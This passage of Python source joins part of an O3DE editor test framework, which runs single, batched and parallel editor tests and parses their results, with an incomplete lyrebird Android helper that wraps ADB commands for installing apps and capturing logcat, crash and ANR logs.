create_runner("run_parallel_batched_tests", cls._run_parallel_batched_tests, parallel_batched_tests)
# Now that we have added the functions to the class, have pytest retrieve all the tests the class contains
pytest_class_instance = super().collect()[0]
# Override the istestfunction for the object, with this we make sure that the
# runners are always collected, even if they don't follow the "test_" naming
original_istestfunction = pytest_class_instance.istestfunction
def istestfunction(self, obj, name):
ret = original_istestfunction(obj, name)
if not ret:
ret = hasattr(obj, "marks")
return ret
pytest_class_instance.istestfunction = types.MethodType(istestfunction, pytest_class_instance)
collection = pytest_class_instance.collect()
def get_func_run_type(function):
return getattr(function, "marks", {}).setdefault("run_type", None)
collected_run_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "run_shared"
]
collected_result_pytestfuncs = [
item for item in collection if get_func_run_type(item.obj) == "result"
]
# We'll remove and store the runner functions for later, this way they won't
# be deselected by any filtering mechanism. The result functions for these we are actually
# interested on them to be filtered to tell what is the final subset of tests to run
collection = [
item for item in collection if item not in collected_run_pytestfuncs
]
# Match each generated pytestfunctions with every runner and store them
for run_pytestfunc in collected_run_pytestfuncs:
runner = run_pytestfunc.function.marks["runner"]
runner.run_pytestfunc = run_pytestfunc
for result_pytestfunc in collected_result_pytestfuncs:
runner = result_pytestfunc.function.marks["runner"]
runner.result_pytestfuncs.append(result_pytestfunc)
self.obj._runners = runners
return collection
@staticmethod
def pytest_custom_makeitem(collector, name, obj):
return EditorTestSuite.EditorTestClass(name, collector)
@classmethod
def pytest_custom_modify_items(cls, session: _pytest.main.Session, items: list[EditorTest],
config: _pytest.config.Config) -> None:
"""
Adds the runners' functions and filters the tests that will run. The runners will be added if they have any
selected tests
:param session: The Pytest Session
:param items: The test case functions
:param config: The Pytest Config object
:return: None
"""
new_items = []
for runner in cls._runners:
runner.tests[:] = cls.filter_session_shared_tests(items, runner.tests)
if len(runner.tests) > 0:
new_items.append(runner.run_pytestfunc)
# Re-order dependent tests so they are run just after the runner
for result_pytestfunc in runner.result_pytestfuncs:
found_test = next((item for item in items if item == result_pytestfunc), None)
if found_test:
items.remove(found_test)
new_items.append(found_test)
items[:] = items + new_items
@classmethod
def get_single_tests(cls) -> list[EditorSingleTest]:
"""
Grabs all of the EditorSingleTests subclassed tests from the EditorTestSuite class
Usage example:
class MyTestSuite(EditorTestSuite):
class MyFirstTest(EditorSingleTest):
from . import script_to_be_run_by_editor as test_module
:return: The list of single tests
"""
single_tests = [c[1] for c in cls.__dict__.items()
if inspect.isclass(c[1]) and issubclass(c[1], EditorSingleTest)]
return single_tests
@classmethod
def get_shared_tests(cls) -> list[EditorSharedTest]:
"""
Grabs all of the EditorSharedTests from the EditorTestSuite
Usage example:
class MyTestSuite(EditorTestSuite):
class MyFirstTest(EditorSharedTest):
from . import script_to_be_run_by_editor as test_module
:return: The list of shared tests
"""
shared_tests = [c[1] for c in cls.__dict__.items()
if inspect.isclass(c[1]) and issubclass(c[1], EditorSharedTest)]
return shared_tests
@classmethod
def get_session_shared_tests(cls, session: _pytest.main.Session) -> list[EditorTest]:
"""
Filters and returns all of the shared tests in a given session.
:session: The test session
:return: The list of tests
"""
shared_tests = cls.get_shared_tests()
return cls.filter_session_shared_tests(session, shared_tests)
@staticmethod
def filter_session_shared_tests(session_items: list[_pytest.python.Function(EditorTest)],
shared_tests: list[EditorSharedTest]) -> list[EditorTest]:
"""
Retrieve the test sub-set that was collected
Note that this can be less than the original set if modified, such as via pytest argument -k
:session_items: The tests in a session to run
:shared_tests: All of the shared tests
:return: The list of filtered tests
"""
def will_run(item):
try:
skip_pytest_runtest_setup(item)
return True
except (Warning, Exception, _pytest.outcomes.OutcomeException) as ex:
# intentionally broad to avoid events other than system interrupts
warnings.warn(f"Test deselected from execution queue due to {ex}")
return False
session_items_by_name = {item.originalname: item for item in session_items}
selected_shared_tests = [test for test in shared_tests if test.__name__ in session_items_by_name.keys() and
will_run(session_items_by_name[test.__name__])]
return selected_shared_tests
@staticmethod
def filter_shared_tests(shared_tests: list[EditorSharedTest], is_batchable: bool = False,
is_parallelizable: bool = False) -> list[EditorSharedTest]:
"""
Filters the provided list of tests on whether they are batchable and/or parallelizable
:shared_tests: List of shared tests
:is_batchable: Filter to batchable tests
:is_parallelizable: Filter to parallelizable tests
:return: The list of filtered tests
"""
return [
t for t in shared_tests if (
getattr(t, "is_batchable", None) is is_batchable
and
getattr(t, "is_parallelizable", None) is is_parallelizable
)
]
@staticmethod
def _prepare_asset_processor(workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor_test_data: TestData) -> None:
"""
Prepares the asset processor for the test depending on whether or not the process is open and if the current
test owns it.
:workspace: The workspace object in case an AssetProcessor object needs to be created
:editor_test_data: The test data from calling editor_test_data()
:return: None
"""
try:
# Start-up an asset processor if we are not already managing one
if editor_test_data.asset_processor is None:
if not process_utils.process_exists("AssetProcessor", ignore_extensions=True):
editor_utils.kill_all_ly_processes(include_asset_processor=True)
editor_test_data.asset_processor = AssetProcessor(workspace)
editor_test_data.asset_processor.start()
else: # If another AP process already exists, do not kill it as we do not manage it
editor_utils.kill_all_ly_processes(include_asset_processor=False)
else: # Make sure existing asset processor wasn't closed by accident
editor_test_data.asset_processor.start()
except Exception as ex:
editor_test_data.asset_processor = None
raise ex
def _setup_editor_test(self, editor: ly_test_tools.launchers.platforms.base.Launcher,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor_test_data: TestData) -> None:
"""
Sets up an editor test by preparing the Asset Processor, killing all other O3DE processes, and configuring
:editor: The launcher Editor object
:workspace: The test Workspace object
:editor_test_data: The TestData from calling editor_test_data()
:return: None
"""
self._prepare_asset_processor(workspace, editor_test_data)
editor_utils.kill_all_ly_processes(include_asset_processor=False)
editor.configure_settings()
@staticmethod
def _get_results_using_output(test_spec_list: list[EditorTest], output: str, editor_log_content: str) -> dict[str, Result.ResultType]:
"""
Utility function for parsing the output information from the editor. It deserializes the JSON content printed in
the output for every test and returns that information.
:test_spec_list: The list of EditorTests
:output: The Editor from Editor.get_output()
:editor_log_content: The contents of the editor log as a string
:return: A dict of the tests and their respective Result objects
"""
results = {}
pattern = re.compile(r"JSON_START\((.+?)\)JSON_END")
out_matches = pattern.finditer(output)
found_jsons = {}
for m in out_matches:
try:
elem = json.loads(m.groups()[0])
found_jsons[elem["name"]] = elem
except Exception: # Intentionally broad to avoid failing if the output data is corrupt
logging.warning("Error reading result JSON", exc_info=True)
continue
# Try to find the element in the log, this is used for cutting the log contents later
log_matches = pattern.finditer(editor_log_content)
for m in log_matches:
try:
elem = json.loads(m.groups()[0])
if elem["name"] in found_jsons:
found_jsons[elem["name"]]["log_match"] = m
except Exception: # Intentionally broad, to avoid failing if the log data is corrupt
logging.warning("Error reading result JSON", exc_info=True)
continue
log_start = 0
for test_spec in test_spec_list:
name = editor_utils.get_module_filename(test_spec.test_module)
if name not in found_jsons.keys():
results[test_spec.__name__] = Result.Unknown(
test_spec, output,
f"Found no test run information on stdout for {name} in the editor log",
editor_log_content)
else:
result = None
json_result = found_jsons[name]
json_output = json_result["output"]
# Cut the editor log so it only has the output for this run
if "log_match" in json_result:
m = json_result["log_match"]
end = m.end() if test_spec != test_spec_list[-1] else -1
else:
end = -1
cur_log = editor_log_content[log_start: end]
log_start = end
if json_result["success"]:
result = Result.Pass(test_spec, json_output, cur_log)
else:
result = Result.Fail(test_spec, json_output, cur_log)
results[test_spec.__name__] = result
return results
@staticmethod
def _report_result(name: str, result: Result.ResultType) -> None:
"""
Raises a pytest failure if the test result is not a PASS, specifying the information
:name: Name of the test
:result: The Result object which denotes if the test passed or not
:return: None
"""
if isinstance(result, Result.Pass):
output_str = f"Test {name}:\n{str(result)}"
print(output_str)
else:
error_str = f"Test {name}:\n{str(result)}"
pytest.fail(error_str)
def _exec_editor_test(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher,
run_id: int, log_name: str, test_spec: EditorTest,
cmdline_args: list[str] = None) -> dict[str, Result.ResultType]:
"""
Starts the editor with the given test and returns a result dict with a single element specifying the result
:request: The pytest request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:run_id: The unique run id
:log_name: The name of the editor log to retrieve
:test_spec: The type of EditorTest
:cmdline_args: Any additional command line args
:return: a dictionary of Result objects (should be only one)
"""
if cmdline_args is None:
cmdline_args = []
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
test_cmdline_args += [
"--regset=/Amazon/Preferences/EnablePrefabSystem=true",
f"--regset-file={os.path.join(workspace.paths.engine_root(), 'Registry', 'prefab.test.setreg')}"]
test_spec_uses_null_renderer = getattr(test_spec, "use_null_renderer", None)
if test_spec_uses_null_renderer or (test_spec_uses_null_renderer is None and self.use_null_renderer):
test_cmdline_args += ["-rhi=null"]
if test_spec.attach_debugger:
test_cmdline_args += ["--attach-debugger"]
if test_spec.wait_for_debugger:
test_cmdline_args += ["--wait-for-debugger"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
test_result = None
results = {}
test_filename = editor_utils.get_testcase_module_filepath(test_spec.test_module)
cmdline = [
"--runpythontest", test_filename,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles=False, launch_ap=False, configure_settings=False)
try:
editor.wait(test_spec.timeout)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
# Save the editor log
workspace.artifact_manager.save_artifact(os.path.join(editor_utils.retrieve_log_path(run_id, workspace), log_name),
f'({run_id}){log_name}')
if return_code == 0:
test_result = Result.Pass(test_spec, output, editor_log_content)
else:
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
crash_output = editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG)
test_result = Result.Crash(test_spec, output, return_code, crash_output, None)
# Save the .dmp file which is generated on Windows only
dmp_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
'error.dmp')
if os.path.exists(dmp_file_name):
workspace.artifact_manager.save_artifact(dmp_file_name)
# Save the crash log
crash_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
os.path.basename(workspace.paths.crash_log()))
if os.path.exists(crash_file_name):
workspace.artifact_manager.save_artifact(crash_file_name)
editor_utils.cycle_crash_report(run_id, workspace)
else:
logger.warning(f"Crash occurred, but could not find log {crash_file_name}")
else:
test_result = Result.Fail(test_spec, output, editor_log_content)
except WaitTimeoutError:
output = editor.get_output()
editor.stop()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
test_result = Result.Timeout(test_spec, output, test_spec.timeout, editor_log_content)
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
results = self._get_results_using_output([test_spec], output, editor_log_content)
results[test_spec.__name__] = test_result
return results
def _exec_editor_multitest(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, run_id: int, log_name: str,
test_spec_list: list[EditorTest],
cmdline_args: list[str] = None) -> dict[str, Result.ResultType]:
"""
Starts an editor executable with a list of tests and returns a dict of the result of every test ran within that
editor instance. In case of failure this function also parses the editor output to find out what specific tests
failed.
:request: The pytest request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:run_id: The unique run id
:log_name: The name of the editor log to retrieve
:test_spec_list: A list of EditorTest tests to run in the same editor instance
:cmdline_args: Any additional command line args
:return: A dict of Result objects
"""
if cmdline_args is None:
cmdline_args = []
test_cmdline_args = self.global_extra_cmdline_args + cmdline_args
test_cmdline_args += [
"--regset=/Amazon/Preferences/EnablePrefabSystem=true",
f"--regset-file={os.path.join(workspace.paths.engine_root(), 'Registry', 'prefab.test.setreg')}"]
if self.use_null_renderer:
test_cmdline_args += ["-rhi=null"]
if any([t.attach_debugger for t in test_spec_list]):
test_cmdline_args += ["--attach-debugger"]
if any([t.wait_for_debugger for t in test_spec_list]):
test_cmdline_args += ["--wait-for-debugger"]
# Cycle any old crash report in case it wasn't cycled properly
editor_utils.cycle_crash_report(run_id, workspace)
results = {}
# We create a file containing a semicolon separated list for the Editor to read
temp_batched_file = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.txt')
for test_spec in test_spec_list[:-1]:
temp_batched_file.write(editor_utils.get_testcase_module_filepath(test_spec.test_module)
.replace('\\', '\\\\')+';')
# The last entry does not have a semicolon
temp_batched_file.write(editor_utils.get_testcase_module_filepath(test_spec_list[-1].test_module)
.replace('\\', '\\\\'))
temp_batched_file.flush()
temp_batched_file.close()
cmdline = [
"--runpythontest", temp_batched_file.name,
"-logfile", f"@log@/{log_name}",
"-project-log-path", editor_utils.retrieve_log_path(run_id, workspace)] + test_cmdline_args
editor.args.extend(cmdline)
editor.start(backupFiles = False, launch_ap = False, configure_settings=False)
output = ""
editor_log_content = ""
try:
editor.wait(self.timeout_editor_shared_test)
output = editor.get_output()
return_code = editor.get_returncode()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
# Save the editor log
try:
workspace.artifact_manager.save_artifact(
os.path.join(editor_utils.retrieve_log_path(run_id, workspace), log_name), f'({run_id}){log_name}')
except FileNotFoundError:
# Error logging is already performed and we don't want this to fail the test
pass
if return_code == 0:
# No need to scrape the output, as all the tests have passed
for test_spec in test_spec_list:
results[test_spec.__name__] = Result.Pass(test_spec, output, editor_log_content)
else:
# Scrape the output to attempt to find out which tests failed.
# This function should always populate the result list, if it didn't find it, it will have "Unknown" type of result
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
assert len(results) == len(test_spec_list), "bug in _get_results_using_output(), the number of results don't match the tests ran"
# If the editor crashed, find out in which test it happened and update the results
has_crashed = return_code != EditorTestSuite._TEST_FAIL_RETCODE
if has_crashed:
crashed_result = None
for test_spec_name, result in results.items():
if isinstance(result, Result.Unknown):
if not crashed_result:
# The first test with "Unknown" result (no data in output) is likely the one that crashed
crash_error = editor_utils.retrieve_crash_output(run_id, workspace,
self._TIMEOUT_CRASH_LOG)
# Save the .dmp file which is generated on Windows only
dmp_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
'error.dmp')
if os.path.exists(dmp_file_name):
workspace.artifact_manager.save_artifact(dmp_file_name)
# Save the crash log
crash_file_name = os.path.join(editor_utils.retrieve_log_path(run_id, workspace),
os.path.basename(workspace.paths.crash_log()))
if os.path.exists(crash_file_name):
workspace.artifact_manager.save_artifact(crash_file_name)
editor_utils.cycle_crash_report(run_id, workspace)
else:
logger.warning(f"Crash occurred, but could not find log {crash_file_name}")
results[test_spec_name] = Result.Crash(result.test_spec, output, return_code,
crash_error, result.editor_log)
crashed_result = result
else:
# If there are remaning "Unknown" results, these couldn't execute because of the crash,
# update with info about the offender
results[test_spec_name].extra_info = f"This test has unknown result," \
f"test '{crashed_result.test_spec.__name__}'" \
f"crashed before this test could be executed"
# if all the tests ran, the one that has caused the crash is the last test
if not crashed_result:
crash_error = editor_utils.retrieve_crash_output(run_id, workspace, self._TIMEOUT_CRASH_LOG)
editor_utils.cycle_crash_report(run_id, workspace)
results[test_spec_name] = Result.Crash(crashed_result.test_spec, output, return_code,
crash_error, crashed_result.editor_log)
except WaitTimeoutError:
editor.stop()
output = editor.get_output()
editor_log_content = editor_utils.retrieve_editor_log_content(run_id, log_name, workspace)
# The editor timed out when running the tests, get the data from the output to find out which ones ran
results = self._get_results_using_output(test_spec_list, output, editor_log_content)
assert len(results) == len(test_spec_list), "bug in _get_results_using_output(), the number of results don't match the tests ran"
# Similar logic here as crashes, the first test that has no result is the one that timed out
timed_out_result = None
for test_spec_name, result in results.items():
if isinstance(result, Result.Unknown):
if not timed_out_result:
results[test_spec_name] = Result.Timeout(result.test_spec, result.output,
self.timeout_editor_shared_test,
result.editor_log)
timed_out_result = result
else:
# If there are remaning "Unknown" results, these couldn't execute because of the timeout,
# update with info about the offender
results[test_spec_name].extra_info = f"This test has unknown result, test " \
f"'{timed_out_result.test_spec.__name__}' timed out " \
f"before this test could be executed"
# if all the tests ran, the one that has caused the timeout is the last test, as it didn't close the editor
if not timed_out_result:
results[test_spec_name] = Result.Timeout(timed_out_result.test_spec,
results[test_spec_name].output,
self.timeout_editor_shared_test, result.editor_log)
finally:
if temp_batched_file:
os.unlink(temp_batched_file.name)
return results
def _run_single_test(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher,
editor_test_data: TestData, test_spec: EditorSingleTest) -> None:
"""
Runs a single test (one editor, one test) with the given specs
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec: The test class that should be a subclass of EditorSingleTest
:return: None
"""
self._setup_editor_test(editor, workspace, editor_test_data)
extra_cmdline_args = []
if hasattr(test_spec, "extra_cmdline_args"):
extra_cmdline_args = test_spec.extra_cmdline_args
result = self._exec_editor_test(request, workspace, editor, 1, "editor_test.log", test_spec, extra_cmdline_args)
if result is None:
logger.error(f"Unexpectedly found no test run in the editor log during {test_spec}")
result = {"Unknown":
Result.Unknown(
test_spec=test_spec,
extra_info="Unexpectedly found no test run information on stdout in the editor log")}
editor_test_data.results.update(result)
test_name, test_result = next(iter(result.items()))
self._report_result(test_name, test_result)
# If test did not pass, save assets with errors and warnings
if not isinstance(test_result, Result.Pass):
editor_utils.save_failed_asset_joblogs(workspace)
def _run_batched_tests(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_data: TestData,
test_spec_list: list[EditorSharedTest], extra_cmdline_args: list[str] = None) -> None:
"""
Runs a batch of tests in one single editor with the given spec list (one editor, multiple tests)
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec_list: A list of EditorSharedTest tests to run
:extra_cmdline_args: Any extra command line args in a list
:return: None
"""
if extra_cmdline_args is None:
extra_cmdline_args = []
if not test_spec_list:
return
self._setup_editor_test(editor, workspace, editor_test_data)
results = self._exec_editor_multitest(request, workspace, editor, 1, "editor_test.log", test_spec_list,
extra_cmdline_args)
editor_test_data.results.update(results)
# If at least one test did not pass, save assets with errors and warnings
for result in results:
if result is None:
logger.error("Unexpectedly found no test run in the editor log during EditorBatchedTest")
logger.debug(f"Results from EditorBatchedTest:\n{results}")
if not isinstance(result, Result.Pass):
editor_utils.save_failed_asset_joblogs(workspace)
return # exit early on first batch failure
def _run_parallel_tests(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_data: TestData,
test_spec_list: list[EditorSharedTest], extra_cmdline_args: list[str] = None) -> None:
"""
Runs multiple editors with one test on each editor (multiple editor, one test each)
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec_list: A list of EditorSharedTest tests to run
:extra_cmdline_args: Any extra command line args in a list
:return: None
"""
if extra_cmdline_args is None:
extra_cmdline_args = []
if not test_spec_list:
return
self._setup_editor_test(editor, workspace, editor_test_data)
parallel_editors = self._get_number_parallel_editors(request)
assert parallel_editors > 0, "Must have at least one editor"
# If there are more tests than max parallel editors, we will split them into multiple consecutive runs
num_iterations = int(math.ceil(len(test_spec_list) / parallel_editors))
for iteration in range(num_iterations):
tests_for_iteration = test_spec_list[iteration*parallel_editors:(iteration+1)*parallel_editors]
total_threads = len(tests_for_iteration)
threads = []
results_per_thread = [None] * total_threads
for i in range(total_threads):
def make_func(test_spec, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = self._exec_editor_test(request, workspace, my_editor, index+1, f"editor_test.log",
test_spec, extra_cmdline_args)
assert results is not None
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_iteration[i], i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
save_asset_logs = False
for result in results_per_thread:
if result is None:
logger.error("Unexpectedly found no test run in the editor log during EditorParallelTest")
logger.debug(f"Results from EditorParallelTest thread:\n{results_per_thread}")
result = {"Unknown":
Result.Unknown(
test_spec=EditorParallelTest,
extra_info="Unexpectedly found no test run information on stdout in the editor log")}
editor_test_data.results.update(result)
if not isinstance(result, Result.Pass):
save_asset_logs = True
# If at least one test did not pass, save assets with errors and warnings
if save_asset_logs:
editor_utils.save_failed_asset_joblogs(workspace)
def _run_parallel_batched_tests(self, request: _pytest.fixtures.FixtureRequest,
workspace: ly_test_tools._internal.managers.workspace.AbstractWorkspaceManager,
editor: ly_test_tools.launchers.platforms.base.Launcher, editor_test_data: TestData,
test_spec_list: list[EditorSharedTest], extra_cmdline_args: list[str] = None) -> None:
"""
Runs multiple editors with a batch of tests for each editor (multiple editor, multiple tests each)
:request: The Pytest Request
:workspace: The LyTestTools Workspace object
:editor: The LyTestTools Editor object
:editor_test_data: The TestData from calling editor_test_data()
:test_spec_list: A list of EditorSharedTest tests to run
:extra_cmdline_args: Any extra command line args in a list
:return: None
"""
if extra_cmdline_args is None:
extra_cmdline_args = []
if not test_spec_list:
return
self._setup_editor_test(editor, workspace, editor_test_data)
total_threads = self._get_number_parallel_editors(request)
assert total_threads > 0, "Must have at least one editor"
threads = []
tests_per_editor = int(math.ceil(len(test_spec_list) / total_threads))
results_per_thread = [None] * total_threads
for i in range(total_threads):
tests_for_thread = test_spec_list[i*tests_per_editor:(i+1)*tests_per_editor]
def make_func(test_spec_list_for_editor, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = None
if len(test_spec_list_for_editor) > 0:
results = self._exec_editor_multitest(request, workspace, my_editor, index+1,
f"editor_test.log", test_spec_list_for_editor,
extra_cmdline_args)
assert results is not None
else:
results = {}
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_thread, i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
save_asset_logs = False
for result in results_per_thread:
if result is None:
logger.error("Unexpectedly found no test run in the editor log during EditorSharedTest")
logger.debug(f"Results from EditorSharedTest thread:\n{results_per_thread}")
result = {"Unknown":
Result.Unknown(
test_spec=EditorSharedTest,
extra_info="Unexpectedly found no test run information on stdout in the editor log")}
editor_test_data.results.update(result)
if not isinstance(result, Result.Pass):
save_asset_logs = True
# If at least one test did not pass, save assets with errors and warnings
if save_asset_logs:
editor_utils.save_failed_asset_joblogs(workspace)
def _get_number_parallel_editors(self, request: _pytest.fixtures.FixtureRequest) -> int:
"""
Retrieves the number of parallel preference based on cmdline overrides, class overrides, or default
:request: The Pytest Request object
:return: The number of parallel editors to use
"""
parallel_editors_value = request.config.getoption("--editors-parallel", None)
if parallel_editors_value:
return int(parallel_editors_value)
return self.get_number_parallel_editors()
|
android_helper.py
|
import os
import sys
import json
import time
import codecs
import lyrebird
import threading
import subprocess
from . import config
from lyrebird import context
from lyrebird.log import get_logger
"""
Android Debug Bridge command helper
Basic ADB command for device_service and API
"""
logger = get_logger()
here = os.path.dirname(__file__)
adb = None
static = os.path.abspath(os.path.join(here, 'static'))
storage = lyrebird.get_plugin_storage()
tmp_dir = os.path.abspath(os.path.join(storage, 'tmp'))
anr_dir = os.path.abspath(os.path.join(storage, 'anr'))
crash_dir = os.path.abspath(os.path.join(storage, 'crash'))
screenshot_dir = os.path.abspath(os.path.join(storage, 'screenshot'))
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if not os.path.exists(anr_dir):
os.makedirs(anr_dir)
if not os.path.exists(crash_dir):
os.makedirs(crash_dir)
class ADBError(Exception):
pass
class AndroidHomeError(Exception):
pass
def check_android_home():
global adb
android_home = os.environ.get('ANDROID_HOME')
if not android_home or android_home == '':
raise AndroidHomeError('Not set env : ANDROID_HOME')
if not os.path.exists(android_home):
raise AndroidHomeError('ANDROID_HOME %s not exists' % android_home)
if not os.path.isdir(android_home):
raise AndroidHomeError('ANDROID_HOME %s is not a dir' % android_home)
if sys.platform == 'win32':
adb = os.path.abspath(os.path.join(android_home, 'platform-tools/adb.exe'))
elif sys.platform == 'darwin' or sys.platform == 'linux':
adb = os.path.abspath(os.path.join(android_home, 'platform-tools/adb'))
else:
raise ADBError('Unsupported platform')
class App:
def __init__(self, package):
self.package = package
self.launch_activity = None
self.version_name = None
self.version_code = None
self.raw = None
@classmethod
def from_raw(cls, package, raw_data):
app = cls(package)
app.raw = raw_data
lines = raw_data.split('\n')
actionMAIN_line_num = None
for index, line in enumerate(lines):
if 'versionCode' in line:
app.version_code = line.strip().split(' ')[0]
if 'versionName' in line:
app.version_name = line.strip().split('=')[1]
if 'android.intent.action.MAIN:' in line:
actionMAIN_line_num = index + 1
if app.version_name and app.version_code and actionMAIN_line_num:
package_name_line = lines[actionMAIN_line_num]
app.launch_activity = package_name_line.strip().split()[1]
break
return app
class Device:
def __init__(self, device_id):
self.device_id = device_id
self.state = None
self.product = None
self.model = None
self._log_process = None
self._log_cache = []
self._log_crash_cache = []
self._log_file = None
self._log_filtered_file = None
self._crash_filtered_file = None
self._anr_filtered_file = None
self._screen_shot_file = None
self._anr_file = None
self._crash_file_list = []
self._device_info = None
self._app_info = None
self.start_catch_log = False
@property
def log_file(self):
return self._log_file
@property
def log_filtered_file(self):
return self._log_filtered_file
@property
def crash_filtered_file(self):
return self._crash_filtered_file
@property
def anr_filtered_file(self):
return self._anr_filtered_file
@property
def screen_shot_file(self):
return self._screen_shot_file
@property
def anr_file(self):
return self._anr_file
@property
def crash_file_list(self):
return self._crash_file_list
@classmethod
def from_adb_line(cls, line):
device_info = [info for info in line.split(' ') if info]
if len(device_info) < 2:
raise ADBError(f'Read device info line error. {line}')
_device = cls(device_info[0])
_device.state = device_info[1]
for info in device_info[2:]:
info_kv = info.split(':')
if len(info_kv) >= 2:
setattr(_device, info_kv[0], info_kv[1])
else:
logger.error(f'Read device info error: unknown format {info_kv}')
return _device
def install(self, apk_file):
subprocess.run(f'{adb} -s {self.device_id} install -r {apk_file}', shell=True)
def push(self, src, dst):
subprocess.run(f'{adb} -s {self.device_id} push {src} {dst}')
def pull(self, src, dst):
subprocess.run(f'{adb} -s {self.device_id} pull {src} {dst}')
def start_log(self):
self.stop_log()
log_file_name = 'android_log_%s.log' % self.device_id
self._log_file = os.path.abspath(os.path.join(tmp_dir, log_file_name))
p = subprocess.Popen(f'{adb} -s {self.device_id} logcat', shell=True, stdout=subprocess.PIPE)
conf = config.load()
package_name = conf.package_name
pid_target = []
p2 = subprocess.run(f'{adb} -s {self.device_id} shell ps | grep {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid_list = p2.stdout.decode().split('\n')
for p2_line in pid_list:
if p2_line:
pid_target.append(str(p2_line).strip().split( )[1])
log_filtered_file_name = 'android_log_%s_%s.log' % (self.device_id, package_name)
self._log_filtered_file = os.path.abspath(os.path.join(tmp_dir, log_filtered_file_name))
crash_filtered_file_name = 'android_crash_%s_%s.log' % (self.device_id, package_name)
self._crash_filtered_file = os.path.abspath(os.path.join(crash_dir, crash_filtered_file_name))
anr_filtered_file_name = 'android_anr_%s_%s.log' % (self.device_id, package_name)
self._anr_filtered_file = os.path.abspath(os.path.join(anr_dir, anr_filtered_file_name))
def log_handler(logcat_process):
log_file = codecs.open(self._log_file, 'w', 'utf-8')
log_filtered_file = codecs.open(self._log_filtered_file, 'w', 'utf-8')
crash_filtered_file = codecs.open(self._crash_filtered_file, 'w', 'utf-8')
anr_filtered_file = codecs.open(self._anr_filtered_file, 'w', 'utf-8')
while True:
line = logcat_process.stdout.readline()
if not line:
context.application.socket_io.emit('log', self._log_cache, namespace='/android-plugin')
log_file.close()
log_filtered_file.close()
crash_filtered_file.close()
anr_filtered_file.close()
return
if self.log_filter(line, pid_target):
log_filtered_file.writelines(line.decode(encoding='UTF-8', errors='ignore'))
log_filtered_file.flush()
if self.crash_checker(line) and self.log_filter(line, pid_target):
crash_filtered_file.writelines(line.decode(encoding='UTF-8', errors='ignore'))
crash_filtered_file.flush()
# send Android.crash event
item = [{
'id':self.device_id,
'crash':[
{'name':'crash_log', 'path':self._crash_filtered_file},
]
}]
lyrebird.publish('android.crash', item)
if self.anr_checker(line):
anr_file_name = os.path.join(anr_dir, 'android_anr_%s.log' % self.device_id)
with codecs.open(anr_file_name, 'r', 'utf-8') as f:
anr_headline = f.readline()
anr_headline = f.readline()
p4 = subprocess.run(f'{adb} -s {self.device_id} shell ps | grep {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid_list = p4.stdout.decode().split('\n')
for p2_line in pid_list:
if p2_line:
pid_target.append(str(p2_line).strip().split( )[1])
if str(anr_headline).strip().split()[2] in pid_target:
subprocess.run(f'{adb} -s {self.device_id} pull "/data/anr/traces.txt" {self._anr_filtered_file}', shell=True, stdout=subprocess.PIPE)
# send Android.crash event
item = [{
'id':self.device_id,
'crash':[
{'name':'anr_log', 'path':self._anr_filtered_file},
]
}]
lyrebird.publish('android.crash', item)
self._log_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
if len(self._log_cache) >= 10:
